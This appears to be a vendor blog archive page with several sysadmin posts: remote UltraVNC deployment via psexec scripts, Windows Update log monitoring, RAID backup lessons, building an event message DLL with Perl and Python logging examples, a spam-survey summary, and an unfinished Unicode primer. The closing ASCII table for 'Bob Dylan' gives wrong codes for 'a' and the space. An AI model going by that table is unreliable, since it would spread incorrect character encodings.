When you run the vnc_start.bat script, it will first check to see if UltraVNC is already installed on the remote host. If it is, it will skip the installation routine and bring up the local VNC viewer. If you configured the script to automatically stop the VNC service when not in use, it will start the service beforehand. When you disconnect, it will (optionally) stop the VNC service again so that VNC is not accessible remotely anymore.

If VNC is not installed, the script will remotely install & configure UltraVNC using psexec.

If you do not want to leave the UltraVNC service installed on the remote computer, the vnc_uninstall.bat script can be run when the remote session is done. Automatically stopping the remote VNC service is however sufficient in most cases.

Prerequisites
There is not much you need:

Installation
The scripts need to be configured before they can be used in your environment, unless you are an EventSentry user, in which case you only need to download & install the prerequisites.

Super Quick Setup for EventSentry Users
It’s no secret, we’re a little biased towards our EventSentry users, and as such setting this up with an existing EventSentry installation is rather easy:

  1. Get psexec.exe and save it in C:\Program Files (x86)\EventSentry\resources.
  2. Download the UltraVNC installers (they have 32-bit and 64-bit – download for the platforms you have on your network) and store them in the C:\Program Files (x86)\EventSentry\scripts\ultravnc folder.
  3. Install UltraVNC on the computer where EventSentry is installed so that the VNC Viewer is available. It’s not necessary to install the whole package, only the viewer component is required.
  4. If “VNC” is not listed in your QuickTools menu, then you will need to add it under Tools->Options->QuickTools. Simply enter “VNC” as the description and specify the path to the vnc_start utility, e.g. “C:\Program Files (x86)\EventSentry\scripts\ultravnc\vnc_start.bat $COMPUTER”. You can optionally check the “Hide” box to prevent the script output from being shown before you connect.

You’ll notice that no password was configured – that’s because you will be logging in with a Windows user and password – only allowing domain admins access by default. This can be configured in the authorized_acl.inf file, if you want to give additional groups and/or users access that are not domain admins.

That’s literally it – easy as pie. Even though we designed this thing to be easy peasy, since things do occasionally go wrong I recommend testing a first connection from the command line. Just open an administrative command prompt, navigate to C:\Program Files (x86)\EventSentry\scripts\ultravnc and type vnc_start somehost.

Now just right-click any host – or use the “Quicktools” button in the ribbon – and select the “VNC” menu option. Keep in mind that first-time connections will take longer since the VNC setup file has to be copied and installed on the remote computer. Subsequent connections should be faster.

VNC Viewer Connect Dialog
VNC Viewer Connect Dialog

Manual Normal-Speed Setup for Non-EventSentry Users
So you are not an EventSentry user but still want to utilize these awesome scripts? No problem – we won’t hold it against you. The setup is still easy – you’ll just need to customize a few variables in the variables.bat file.

  1. Download the package from here.
  2. Create a local folder for this project, e.g. C:\Deployment\UltraVNC.
  3. Copy all the scripts to this folder, e.g. you should end up with C:\Deployment\UltraVNC\vnc_start.bat
  4. Open the file variables.bat in a text editor and keep it open as you will be making a few modifications to this file.
  5. In variables.bat, set the VNCSOURCE variable to the directory you just created.
  6. Download the latest version of both the 32-bit and 64-bit UltraVNC installers.
  7. In variables.bat, set the VNCSETUP_X86 and VNCSETUP_X64 to the setup file names you just downloaded.
  8. Download the PSTools and extract psexec.exe into the working directory, or a directory of your choice.
  9. In variables.bat, point the PSEXECFILE variable to the location where you just saved psexec.exe.
  10. Optional: Edit the authorized_acl.inf file to specify which Windows group or user will have access to VNC. You can either change the first line, or add additional lines to give additional users and/or groups permission.
  11. Install the respective version of UltraVNC on your workstation so that the VNC Viewer is available.
  12. Open a command line window and navigate to the folder to which VNCSOURCE points to. Test the setup by running vnc_start hostname, replacing “hostname” with an actual host name of a remote host of course.
  13. When presented with the login screen of the VncViewer, log in with a Windows domain admin user.

That wasn’t so bad now, was it? Just remember that you’ll need to initiate any VNC session with the vnc_start.bat file. Just launching the Viewer won’t work – even if VNC is already installed on the remote machine – since the VNC service is stopped by our scripts by default. To use the folder names we created, you’ll just run

C:\Deployment\UltraVNC\vnc_start hostname

Enjoy, and happy RFBing!

Connecting to remote host
Connecting to remote host

Configuration – variables.bat
For the sake of completeness the variables.bat file is explained below:

VNCSETUP_X86: The file name of the 32-bit installer. This needs to only be changed whenever UltraVNC comes out with a new version.
VNCSETUP_X64: The file name of the 64-bit installer. This needs to only be changed whenever UltraVNC comes out with a new version.

REMOTEINSTALLPATH: The directory where the script files will be copied to on the remote host.

VNCSOURCE: This is the folder where all the vnc-related files, including the setup executables, are located on the source host from where you initiate VNC connections – e.g. C:\Deployment\UltraVNC.
VNCINSTALLDIR: The directory in which UltraVNC will be installed in (on the remote hosts).

VNCPASSWORD: This variable is not currently used since UltraVNC is automatically configured to authenticate against Windows, by default giving only Domain Admins access to VNC. This is generally more secure than using a password. You can edit the file authorized_acl.inf to give additional users and/or groups access to VNC. The file supports one ACL entry per line.

PSEXECFILE: Unfortunately we are not allowed to bundle the nifty psexec.exe file for license reasons, so you’ll have to download the PsTools and point this variable to wherever you end up copying the psexec.exe file to. If you already have psexec.exe installed then you can save yourself 2 minutes of time and just specify the path to the existing file here.

SET_VNC_SVC_TO_MANUAL: If you don’t entirely trust the security of VNC, maybe because you know what a brute force attack is, and you only want administrators to access VNC then you can set this variable to 1. As long as you only connect to the remote host(s) using the vnc_install.bat script, the scripts will ensure that the remote VNC service is started before you connect and stopped after you disconnect. Between the two of us, I’d always leave this set to 1 unless you have the desire to launch the VNC Viewer directly, or need non-administrators to be able to connect to the remote host(s).

ADD_FIREWALL_RULE: As the name (almost) implies, this will create a firewall exclusion rule on the remote host(s) if you’ve been doing your homework and enabled the Windows firewall. If you don’t like our boring firewall rule name then you can even change the name below by editing the FW_RULE_NAME variable. Enabling this is usually not necessary since the UltraVNC setup adds firewall exclusion rules by default.

VNCVIEWER: If you find that a different version of the VNC viewer works better than the version which we are shipping, then you can change the file name here.

 

Monitoring Windows Updates

Automatic Windows Updates are a wonderful thing when they are working as expected, and many organizations employ WSUS or patch management software to keep their infrastructure up to date with the latest Microsoft hot fixes and service packs.

While this works for many, not everybody can afford patch management software, and, while free, managing the disk-hungry WSUS can be a daunting task as well. This leaves some sysadmins to use the old-fashioned Windows Updates to install all the regular and out-of-band patches Microsoft releases.

If you don’t feel comfortable installing patches automatically however, configuring Windows Update to “download updates for later manual installation” is often safer and more predictable. But, if you’re not logging on to the server(s), you won’t know whether one or more updates are ready for installation or not. Even if you’re just managing one server, checking in on a regular basis can be a waste of time.

updates_are_ready.pngThis is where EventSentry and its log file monitoring feature comes in. It turns out that Windows, like a diligent ship captain, logs all activity to a log file. And with all, I really do mean ALL. The file I’m talking about is windowsupdate.log, and it tells you just about everything that’s going on with Windows Update. In 3-4 steps that don’t take longer than 5 minutes, you can setup real-time monitoring of the WindowsUpdate.log file, and be notified when updates are about to be downloaded to a monitored computer.

The screenshot below shows what such an email from EventSentry would look like:

email_approved_updates.png

From then on, you can either get email notifications when patches are downloaded, or use the web-based reporting to view a report from all of your monitored hosts. On a high level, the configuration works like this:

  • 1. Setup a log file (%systemroot%\windowsupdate.log in this case)
  • 2. Create & assign a new log file package
  • 3. Define a log file filter (this tells EventSentry what to look for in the file, and where to send it)
  • 4. Setup an email action (this is usually already setup)
  • 5. Optionally setup an event log filter to forward alerts to email (the default filter setup should automatically forward warnings)

The WindowsUpdate.log is useful for troubleshooting as well, and you can consolidate the content of this file from all of your servers in the central EventSentry database. This makes searching for text and/or comparing the log from multiple servers a breeze. Having the log file accessible through the web reports is also useful when a patch caused problems and the server is offline. You can view the most recent activity from the log file through the web-based reporting even when the server is unavailable.

So how do you set this up? Assuming you have EventSentry v2.93 installed (any edition will do, including the free “light” version), you can follow the steps outlined below. Note that all steps will need to be performed in the EventSentry management console.


1. Setup a file definition.
This tells EventSentry which file you want to monitor, and sets up a logical representation of that file in the EventSentry configuration. In the “Tools” menu, click “Log Files and File Types” and then click the “Add” button.

menu_tools.png

add_file_definition.png

tree_logfile_package.png

2. Create a package and add a filter. Right-click the “Log File Packages” container, select  “Add Package” and choose a descriptive name. Since new packages are unassigned by default, right-click the newly created package, select “Assign” and assign the package to host(s) on which you want to monitor the Windowsupdate log file.

3. Setup a log file filter. This tells EventSentry which content of the monitored file you are interested in. In every log file filter you can configure a database as well as an event log filter.

Right-click the previously created package and select “Add File”. From the list, select the log file definition created in step 1, “WindowsUpdateLog”. Select the new log file.

The database tab determines which content goes to the database (in most cases you will write all file contents to the database), while the event log tab determines which log file contents are written to the event log. For this project, we are interested in the following wildcard matches:

*AU*# Approved Updates =*

*DnldMgr*Updates to download =*

The first wildcard match will tell you the total number of updates which have been approved and will be downloaded, whereas the 2nd line will fire for every individual update which will be downloaded. In most cases the first line is sufficient and the 2nd line can be skipped.

file_filter_eventlog.png

That’s it! With this setup, you will immediately get notified when patches are ready to be installed. The only thing I didn’t mention here is how to setup an email action and corresponding event log filter, since both of these are usually already setup by default. If you need help with this, please check out our documentation and/or
tutorials.

Please note that the full and evaluation version of EventSentry can inventory installed software and patches. This enables you to use the web interface for viewing/searching installed patches, and get (email) alerts when a patch has been successfully installed.

As always, happy monitoring!

Do not trust thee RAID alone

I’m assuming that most readers are familiar with what RAID, the “Redundant Array of Inexpensive Disks”, is. Using RAID for disk redundancy has been around for a long time, apparently first mentioned in 1987 at the University of California, Berkeley (see also: The Story So Far: The History of RAID). I’m honestly not sure why they chose the term “inexpensive” back in 1987 (I suppose “RAD” isn’t as catchy of a name), but regardless of the wording, a RAID is a fairly easy way to protect yourself against hard drive failure. Presumably, any production server will have a RAID these days, especially with hard drives being as inexpensive as they are today (unless you purchase them list price from major hardware vendors, that is). Another reason why RAID is popular, is of course the fact that hard drives are probably the most common component to break in a computer. You can’t really blame them either, they do have to spin an awful lot.

burnt_server.jpg

Lesson #1: Don’t neglect your backups because you are using RAID arrays
That being said, we recently had an unpleasant and unexpected issue in our office with a self-built server. While it is a production server, it is not a very critical one, and as such a down-time of 1-2 days with a machine like that is acceptable (albeit not necessarily desired). Unlike the majority of our “brand-name” servers, which are under active support contracts, this machine was using standard PC components (it’s one of our older machines), including an onboard RAID that we utilized for both the OS drive as well as the data drive (it has four disks, both in a RAID 1 mirror). Naturally, the machine is monitored through EventSentry.

Well, one gray night it happened – one of the hard drives failed and a bunch of events (see myeventlog.com for an example) were logged to the event log, and immediately emailed to us. After disappointingly reviewing the emails, the anticipated procedure was straightforward:

1) Obtain replacement hard drive
2) Shut down server
3) Replace failed hard drive
4) Boot server
5) Watch RAID rebuilding while sipping caffeinated beverage

The first 2 steps went smoothly, but that’s unfortunately how far our IT team got. The first challenge was to identify the failed hard drive. Since they weren’t in a hot-swappable enclosure, and the events didn’t indicate which drive had failed, we chose to go the safe route and test each one of them with the vendors supplied hard drive test utility. I say safe, because it’s possible that a failed hard drive might work again for a short period of time after a reboot, so without testing the drives you could potentially hook the wrong drive up. So, it’s usually a good idea to spend a little bit of extra time in that case, to determine which one the culprit is.

Eventually, the failed hard drive was identified, replaced with the new (exact and identical) drive, connected, and booted again. Now normally, when connecting an empty hard drive, the raid controller initiates a rebuild, and all is well. In this case however, the built-in NVidia RAID controller would not recognize the RAID array anymore. Instead, it congratulates us on having installed two new disks. Ugh. Apparently, the RAID was no more – it was gone –  pretty much any IT guys nightmare.

No matter what we tried, including different combinations, re-creating the original setup with the failed disks, trying the mirrored drive by itself, the RAID was simply a goner. I can’t retell all the things that were tried, but we ultimately had to re-create the RAID (resulting in an empty drive), and restore from backup.

We never did find out why the RAID 1 mirror that was originally setup was not recognized anymore, and we suspect that a bug in the controller firmware caused the RAID configuration to be lost. But regardless of what was ultimately the cause, it shows that even entire RAID arrays may fail. Don’t relax your backup policy just because you have a RAID configured on a server.

Lesson #2: Use highly reliable RAID levels, or configure a hot spare
Now I’ll admit, the majority of you are running your production servers on brand-name machines, probably with a RAID1 or RAID5, presumably under maintenance contracts that ship replacement drives within 24 hours or less. And while that does sound good and give you comfort, it might actually not be enough for critical machines.

Once a drive in a RAID5 or RAID1 fails, the RAID array is in a degraded state and you’re starting to walk on very thin ice. At this point, of course, any further disk failure will require a restore from backup. And that’s usually not something you want.

So how could a RAID 5 not be sufficiently safe? Please, please: Let me explain.

Remember that the RAID array won’t be fully fault tolerant until the RAID array is rebuilt – which might be many hours AFTER you plug in the repaired disk depending on the size, speed and so forth. And it is during the rebuild period that the functional disks will have to work harder than usual, since the parity or mirror will have to be re-created from scratch, based on the existing data.

Is a subsequent disk failure really likely though? It’s already pretty unlikely a disk fails in the first place – I mean disks don’t usually fail every other week. It is however much more likely than you’d think, somewhat depending on whether the disks are related to each other. What I mean with related, is whether they come from the same batch. If there was a problem in the production process – resulting in a faulty batch – then it’s actually quite likely that another bites the dust sooner rather than later. It happened to a lot of people – trust me.

But even if the disks are not related, they probably still have the same age and wear and, as such, are likely to fail in a similar time frame. And, like mentioned before, the RAID array rebuild process will put a lot of strain on the existing disks. If any disk is already on its last leg, then a failure will be that much more likely during the RAID array rebuild process.

raid6.pngRAID 6, if supported by your controller, is usually preferable to a RAID5, as it includes two parity blocks, allowing up to two drives to fail. RAID 10 is also a better option with potentially better performances, as it too continues to operate even when two disks fail (as long as it’s not the disks that are mirrored). You can also add a hot spare disk, which is a stand-by disk that will replace the failed disk immediately.

If you’re not 100% familiar with the difference between RAID 0, 1, 5, 6, 10 etc. then you should check out this Wikipedia article: It outlines all RAID levels pretty well.

Of course, a RAID level that provides higher availability is usually less efficient in regards to storage. As such, a common counterargument against using a more reliable RAID level is the additional cost associated with it. But when designing your next RAID, ask yourself whether the savings of an additional hard drive is worth the additional risk, and the potential of having to restore from a backup. I’m pretty sure that in most cases, it’s not.

Lesson #3: Ensure you receive notifications when a RAID array is degraded
Being in the monitoring business, I need to bring up another extremely
important point: Do you know when a drive has failed? It doesn’t help much to have a RAID when you don’t know when one or more drives have failed.

Most server
management software can notify you via email, SNMP and such – assuming
it’s configured. Since critical events like this almost always trigger
event log alerts as well though, a monitoring solution like EventSentry can simplify the notification process.
Since EventSentry monitors event logs, syslog as well as SNMP traps, you can take a uniform approach to notifications. EventSentry can notify you of RAID failures regardless of the hardware vendor you
use – you just need to make sure the controller logs the error to the
event log.

Lesson #4+5: Test Backups, and store backups off-site
Of course one can’t discuss reliability and backups without preaching the usual. Test your backups, and store (at least the most critical ones) off-site.

Yes, testing backups is a pain, and quite often it’s difficult as well and requires a substantial time commitment. Is testing backups overkill, something only pessimistic paranoids do? I’m not sure. But we learned our lessen the hard way when all of our 2008 backups were essentially incomplete, due to a missing command-line switch that recorded (or in our case did not) the system state. We discovered this after, well, we could NOT restore a server from a backup. Trust me: Having to restore a failed server and having only an incomplete, out-of-date or broken backup, is not a situation you want to find yourself in.

My last recommendation is off-site storage. Yes, you have a sprinkler system, building security and feel comfortably safe. But look at the picture on top. Are you prepared for that? If not, then you should probably look into off-site backups.

So, let me recap:

1. Don’t neglect your backups because you are using RAID arrays.
2. Use highly reliable RAID levels, or configure a hot spare.
3. Ensure you receive notifications when a RAID array is degraded
4. Test your backups regularly, but at the very least test them once to ensure they work.
5. Store your backups, or at least the most critical, off-site.

Stay redundant,
Ingmar.

Read more

Creating your very own event message DLL

If you’ve ever wrote code to log to the Windows event log before (e.g. through Perl, Python, …), then you might have run into a similar problem that I described in an earlier post: Either the events don’t look correctly in the event log, you are restricted to a small range of event ids (as is the case with eventcreate.exe) or you cannot utilize insertion strings.

In this blog post I’ll be showing you how to build a custom event message DLL, and we’ll go about from the beginning to the end. We’ll start with creating the DLL using Visual Studio (Express) and finish up with some example scripts, including Perl of course, to utilize the DLL and log elegantly to the event log.

Let’s say you are running custom scripts on a regular basis in your network – maybe with Perl, Python, Ruby etc. Your tasks, binary as they are, usually do one of two things: They run successfully, or they fail. To make troubleshooting easier, you want to log any results to the event log – in a clean manner. Maybe you even have sysadmins in other countries and want to give them the ability to translate standard error messages. Logging to the event log has a number of benefits: It gives you a centralized record of your tasks, allows for translation, and gives you the ability to respond to errors immediately (well, I’m of course assuming you are using an event log monitoring solution such as EventSentry). Sounds interesting? Read on!

Yes, you can do all this, and impress your peers, by creating your own event message file. And what’s even better, is that you can do so using all free tools. Once you have your very own event message file, you can utilize it from any application that logs to the event log, be it a perl/python/… script or a C/C++/C#/… application.

To create an event message file, you need two applications:

The reason you need the platform SDK, is because Visual Studio Express does not ship with the Message Compiler, mc.exe, for some reason. The message file compiler is essential, as without it there will be no event message file unfortunately. When installing the platform SDK, you can deselect all options except for “Developer Tools -> Windows Development Tools -> Win32 Development Tools” if you want to conserve space. This is the only essential component of the SDK that’s needed.

An event message file is essentially a specific type of resource that can be embedded in either a DLL file or executable. In EventSentry, we originally embedded the message file resources in a separate DLL, but eventually moved it into the executable, mostly for cleaner and easier deployment. We’ll probably go back to a separate message DLL again in the future, mostly because processes (e.g. the Windows Event Viewer) can lock the event message file (the executable in our case), making it difficult to update the file.

Since embedding an event message file in a DLL is more flexible and significantly easier to accomplish, I’ll be covering this scenario here. The DLL won’t actually contain any executable code, it will simply serve as a container for the event definitions that will be stored inside the .dll file. While it may sound a little bit involved to build a DLL just for the purpose of having an event message file (especially to non-developers), you will see that it is actually surprisingly easy. There is absolutely no C/C++ coding required, and I also made a sample project available for download, which has everything setup and ready to go.

In a nutshell, the basic steps of creating an event message file are as follows:

1. Create a message file (e.g. messagefile.mc)
2. Convert the message file into a DLL, using mc.exe, rc.exe and link.exe

Once we have the message file, we will also need to register the event message file in the registry, and associate it with an event source. Keep in mind that the event source is not hard-coded into the message file itself, and in theory a single event message file could be associated with multiple event sources (as is the case with many event sources from Windows).

So let’s start by creating a working folder for the project, and I will call it “myapp_msgfile”. Inside that directory we’ll create the message file, let’s call it myapp_msgfile.mc. This file is a simple text file, and you can edit it with your favorite text editor (such as Ultraedit, Notepad2 or Notepad++).

The file with the .mc extension is the main message file that we’ll be editing – here we define our event ids, categories and so forth. Below is an example, based on the scenario from before. Explanations are shown inline.


MessageIdTypedef=WORD

LanguageNames=(
English=0x409:MSG00409
German=0x407:MSG00407
)

Here we define which languages we support, and by which files these languages will be backed. You will have to look up the language id for other languages if you plan on supporting more, and you can remove German if you only plan on supporting English.


MessageId=1
SymbolicName=MYTOOL_CATEGORY_GENERAL
Language=English
Tasks
.
Language=German
Jobs
.

Our first event id, #1, will be used for categories. Categories work in the exact same way as event ids. When we log an event to the event log and want to include a category, then we only log the number – 1 in this case.


MessageId=100
SymbolicName=TASK_OK
Language=English
Task %1 (%2) completed successfully.
.
Language=German
Job %1 (%2) war erfolgreich.
.

This is the first event description. The “MessageId” field specifies the event id, and the symbolic name is a descriptive and unique name for the event. The language specifies one of the supported languages, followed by the event message text. You end the event description with a single period – that period has to be the only character per line.


MessageId=101
SymbolicName=TASK_ERROR
Language=English
Task %1 (%2) failed to complete due to error “%3”.
.
Language=German
Job %1 (%2) konnte wegen Fehler “%3” nicht abgeschlossen werden.
.

MessageId=102
SymbolicName=TASK_INFO
Language=English
Task Information: %1
.
Language=German
Job Information: %1
.

Since we’re trying to create events for “custom task engine”, we need both success and failure events here. And voila, our event message file now has events 100 – 102, plus an id for a category.

So now that we have our events defined, we need to convert that into a DLL. The first step now is to use the message compiler, mc.exe, to create a .rc file as well as the .bin files. The message compiler will create a .bin file for every language that is defined in the mc file. Open the “Visual Studio Command Prompt (2010)” in order for the following commands to work:


mc.exe myapp_msgfile.mc

will create (for the .mc file depicted above):


myapp_msgfile.rc
msg00407.bin
msg00409.bin

With those files created, we can now create a .res (resource) file with the resource compiler rc.exe:


rc.exe /r myapp_msgfile.rc

which will create the


myapp_msgfile.res

file. The “/r” option instructs the resource compile to emit a .res file. Now we’re almost done, we’re going to let the linker do the rest of the work for us:


link -dll -noentry -out:myapp_msgfile.dll myapp_msgfile.res

The myapp_msgfile.res is the only input file to the linker, normally one would supply object (.obj) files to the linker to create a binary file. The “-noentry” option tells the linker that the DLL does not have an entry point, meaning that we do not need to supply a DllMain() function – thus the linker is satisfied even without any object files. This is of course desired, since we’re not looking to create a DLL that has any code or logic in it.

After running link.exe, we’ll end up with the long awaited myapp_msgfile.dll file.

The end. Well, almost. Our message file is at this point just a lone accumulation of zeros and ones, so we need to tell Windows that this is actually a message file for a particular event log and source. That’s done through the registry, as follows:

Open the registry editor regedit.exe. Be extremely careful here, the registry editor is a powerful tool, and needs to be used responsibly :-).

All event message files are registered under the following key:


HKLM\System\CurrentControlSet\Services\eventlog

Under this key, you will find a key for every event log as well as subkeys for every registered event source. So in essence, the path to an event source looks like this:


HKLM\System\CurrentControlSet\Services\eventlog\EVENTLOG\EVENTSOURCE

I’m going to assume here that we are going to be logging to the application event log, so we’d need to create the following key:


HKLM\System\CurrentControlSet\Services\eventlog\Application\MyApp

In this key, we need to following values:


TypesSupported (REG_DWORD)
EventMessageFile (REG_EXPAND_SZ)

TypesSupported is usually 7, indicating that the application will log either Information, Warning or Error events (you get 7 if you OR 1[error], 2[warning] and 4[information] together).

EventMessageFile is the path to your message DLL. Since the type is REG_EXPAND_SZ, the path may contain environment variables.

If you plan on utilizing categories as well, which I highly recommend (and for which our message file is already setup), then you need two additional values:


CategoryCount (REG_DWORD)
CategoryMessageFile (REG_EXPAND_SZ)

CategoryCount simply contains the total number of categories in your message file (1, in our case), and the CategoryMessageFile points to our message DLL. Make sure that your message file does not contain any sequence gaps, so if your CategoryCount is set to 10, then you need to have an entry for every id from 1 to 10 in the message file.

We could create separate message files for messages and categories, but that would be overkill for a small project like this.

Now that we have that fancy message DLL ready to go, we need to start logging. Below are some examples of how you can log to the event log with a scripting language. I’ll be covering Perl, Kix, and Python. Me being an old Perl fand and veteran, I’ll cover that first.

PERL
The nice thing about Perl is that you can take full advantage of insertion strings, so it can support event definitions containing more than one insertion string.


use strict;
use Win32::EventLog;


# Call this function to log an event

sub logMessage
{
my ($eventID, $eventType, @eventDetails) = @_;

my $evtHandle = Win32::EventLog->new(“Your Software Application”);

my %eventProperties;

   # Category is optional, specify only if message file contains entries for categories

$eventProperties{Category}      = 0;
$eventProperties{EventID}       = $eventID;
$eventProperties{EventType}     = $eventType;
$eventProperties{Strings}       = join("\0", @eventDetails);

$evtHandle->Report(\%eventProperties);

$evtHandle->Close;
}


# This is what you would use in your scripts to log to the event log. The insertion strings
# are passed as an array, so even if you only have one string, you would need to pass it
# within brackets (“This is my message”) as the last parameter

logMessage(100, EVENTLOG_INFORMATION_TYPE, (“Database Backup”, “Monitoring Database”, “Complete”));
logMessage(102, EVENTLOG_INFORMATION_TYPE, (“Step 1/3 Complete”));


PYTHON

Python supports event logging very well too, including multiple insertion strings. See the sample code below:


import win32evtlogutil
import win32evtlog


# Here we define our event source and category, which we consider static throughout
# the application. You can change this if the category is different

eventDetails = {‘Source’: ‘MyApp’,    # this is id from the message file
‘Category’: 1}        # which was set aside for the category


# Call this function to log an event

def logMessage(eventID, eventType, message, eventDetails):
if type(message) == type(str()):
message = (message,)
win32evtlogutil.ReportEvent(eventDetails[‘Source’], eventID, eventDetails[‘Category’], eventType, tuple(message))

logMessage(100, win32evtlog.EVENTLOG_INFORMATION_TYPE, (“Database Backup”, “Monitoring Database”), eventDetails)
logMessage(102, win32evtlog.EVENTLOG_INFORMATION_TYPE, (“Step 1/3 complete”), eventDetails)

KIXTART
The pro: Logging to the event log using KiXtart is so easy it’s almost scary. The con: It only supports message files that use one insertion string.


LOGEVENT(4, 102, "Database Backup", "", "MyApp")

Curiosity Kills the Cat

25 years ago, on July 24th 1985, the Amiga 1000 was introduced in New York City (check out the ad). Coincidentally, the Amiga 500 was my first computer and I loved playing games on the Rock Lobster – despite the 7.15909 MHz processor. Well, those were the good old days, the days before mainstream email, the days before spam. Or were they? Believe it or not, in 1985 it had already been 7 years since the first spam email was sent by Gary Thuerk over the ARPAnet.

amiga_1000.jpg

I don’t know about you, but 32 years later I still get spam delivered to my inbox on a daily basis, and that’s despite having 2-3 spam filters in place. What’s more, I still get legitimate email caught by the spam filter, mostly to the dismay of the sender.

Now, of course WE all know not to open spam – or to even look at it – as it will potentially confirm receipt (if you display images from non-trusted sources) and could also trigger malware (again depending on your email reader’s configuration).

But, we’ve all seen spam emails and I can’t help but wonder who actually reads these emails (for purposes other than to get a chuckle), much less opens them! Let’s not even think about who opens attachments or clicks links (yikes!) from spam emails.

spam_adjusted.jpg

The Facts

So WHO are those people opening, clicking spam? Well, turns out that the MAWWG, the Messaging Anti-Abuse Working Group determines exactly that (and presumably other things too) – every year. Better yet, they publish that information for our enjoyment.

It’s been a few months since the latest findings were published, but I’d consider them relevant today nevertheless (and a year from now for that matter).

In a nutshell, the group surveyed the behavior of consumers both in North America and Europe, and published key findings in regards to awareness, consumer confidence and so forth.

Before I give the link to the full PDF (see the Resources section below); here are what I think are some of the most interesting facts:

  • Half of all users in North America and Europe have “confessed” to opening or accessing spam. 46% of those who opened spam, did so intentionally to unsubscribe or out of some untameable sense of curiosity. Some were even interested in the products “advertised” to them!

    Bottom Line: 1 out of 4 people open spam emails because they want to know more, or want to unsubscribe.

  • In more detail, 19% of all users surveyed either clicked on a link from an email (11%) or opened an attachment from an email (8%) that they themselves suspected to be spam. I found that to be one of the most revealing numbers in the report.
  • Young users (under 35) consider themselves more experienced, yet at the same time engage in more risky behavior than other age groups. In Germany, 33% of all users consider themselves to be experts. Compare that to France, where only 8% of all users think they are pros.
  • Less than half of users think that stopping spam or viruses is their responsibility. Instead, they feel that the responsibility lies mainly with the ISP and A/V companies. 48% of all respondents do realize that it is their responsibility. The report doesn’t state whether this particular question, which lists 10 choices, was a multiple choice question.
  • When asked about bots, 84% of users were familiar with the possibility that software, say a virus, can control their computer. At the same time, only 47% were familiar with the terms “bot” or “botnet”.
  • On the upside, 94% of all users are running A/V software that is up-to-date, which is a comforting fact. I can only imagine that the remaining 6%, given Apple’s market share, account for most of the rest.

    My opinion: OS X users are probably still oblivious and don’t see the need to install A/V or any other type of security software on their computers. Still, some PC users apparently still don’t install AntiVirus/AntiMalware on their computers, despite many free options being available today.

Wow, that’s a lot of bad news to digest. So if I may summarize – the reason why we keep getting spam in our inboxes, is because every 5th person with a computer clicks on links or opens attachments (ah!) from spam emails, and because 6% of all users with a computer don’t run security software. Given the amount of people that dwell in the western hemisphere, that amounts to a lot of people.

Well, at least I know now why I keep getting those nuisance emails in my inbox. But somehow I don’t feel any better about them.

Training Day

I think what this report shows us the importance of user education. While people are apparently aware of spam, it doesn’t look like the average Joe is aware of the implications that a simple click in an email can have.

If you are reading this email, then you are probably a network professional working in an organization. With that, you have a unique opportunity to organize a simple workshop with your employees to educate them about the potential threats, and remind them that it’s not a good idea to do anything with suspect emails.

botnet.png

There is a wealth of information available on the web about educating users on spam and general computer security. We all know that software can only do so much – it’s a constant cat & mouse game between the researchers and the bad guys. It’s simply not possible, at least not today, to make the computers we use on a daily basis 100% secure.

While securing computers in a corporation is possible to some extent using whitelisting, content filters and such, doing the same thing for home computers is much more difficult. And it’s those computers that are most likely to be part of a botnet.

I can only imagine that the average user does not know that botnets can span thousands, if not millions, of computers. The Conficker botnet alone infected around 10 million computers and has the capacity to send 10 billion emails per day.

Let’s face it, the situation will not improve as long as people will click links in emails and open attachments from suspicious senders.

I encourage you to organize a training session with your users on a regular basis. If your organization is large, then you might want to start with the key employees first, and maybe create a tiered training structure.

Our Network is Safe

You might think that your network is safe. You have AntiVirus, white listing, AntiMalware, firewalls in every corner, web content filters and more. Scheduling a training sessions to tell your users on not to do the obvious, is probably the last thing on your mind.

But read on.

Risky behavior by your end users will not only affect global spam rates, but your organization as well. Corporate espionage is growing, and spies (whether they are from a foreign government or corporation) often use email to initially get access to an individuals computers. See SANS Corporate Espionage 201 (PDF) for some techniques being employed.

For example, pretty much every organization has people working from home. If a malicious attacker can compromise a home computer that is used to access a corporate network (even if it’s just used to access emails) and install a key logger, then they will most likely have gotten access to your corporate network. Once they have their foot in the door, it’s only a matter of time.

There are plenty of resources available on the net on how to educate users on security, spam and so forth. A short training session of 20 minutes is probably enough. The message to convey is simple, and if you keep a few points in mind the session can even be fun. Consider the following for the training session:

  • Be sure to interact with your users. Start off by asking them if they use A/V software or AntiMalware software at home.
  • Tell them about botnets, and if they would be happy knowing that their computer is part of a 10 million botnet controlled by people in the Ukraine.
  • Be sure to explain that a single users actions can compromise their corporate network.
  • Explain that technology cannot provide 100% security against intruders.

Of course, user education alone is not the answer to solving security problems like viruses, phishing and the like. Encryption, digital signatures (especially for corporate emails), white-listing all should be employed regardless of user education.

Resources

2010 MAAWG Consumer Survey Key Findings Report (6 pages)
2010 MAAWG Consumer Survey Full Report (87 pages)

Using Cartoons to Teach Internet Security
Get IT Done: IT pros offer tips for teaching users

UNICODE – ONE code to rule them all

If you live in an English-speaking country like the United States, United Kingdom or Australia, then you are in the lucky position where every character in your language can be represented by the ASCII table. Many other languages aren’t as lucky unfortunately, and it is no surprise given the fact that over 1000 written languages exist. Most of these languages cannot be interpreted by ASCII, most notably Asian and Arabic languages.

Take the text below for example, ASCII would be struggling with this a bit (to say the least):

النمسا

Understanding UNICODE is no easy feat however – just the mere abbreviations out there can be mind-boggling: UTF-7, 8, 16, 32, UCS-2, BOM, BMP, code points, Big-Endian, Little-Endian and so forth. UNICODE support is particularly interesting when dealing with different platforms, such as Windows, Unix and OS X.

It’s not all that bad though, and once the dust settles it can all make sense. No, really. As such, the purpose of this article is to give you a basic understanding of UNICODE, enough so that the mention of the word UNICODE doesn’t give you cold shivers down your back.

Unicode is essentially one large character set that includes all characters of written languages, including special characters like symbols and so forth. The goal – and this goal is reality today – is to have one character set for all languages.

Back in 1963, when the first draft of ASCII was published, Internationalization was probably not on the top of the committee member’s minds. Understandable, considering that not too many people were using computers back then. Things have changed since then, as computers are turning up in pretty much every electrical device (maybe with the exception of stoves and blenders).

The easiest way to start is, of course, with ASCII (American Standard Code for Information Interchange). Gosh were things simple back in the 60s. If you want to represent a character digitally, you would simply map it to a number between 1 and 127. Voila, all set. Time to drive home in your Chevrolet, and listen to a Bob Dylan, Beach Boys or Beatles record. I won’t go in to the details now, but for the sake of completeness I will include the ASCII representation of the word “Bob Dylan”:


String:      B    o    b         D    y    l    a    n
Decimal:     66   111  98   32   68   121  108  111  110
Hexadecimal: 0x42 0x6F 0x62 0x20 0x44 0x79 0x6C 0x6F 0x6E
Binary:      01000010 01101111 01100010 00010100
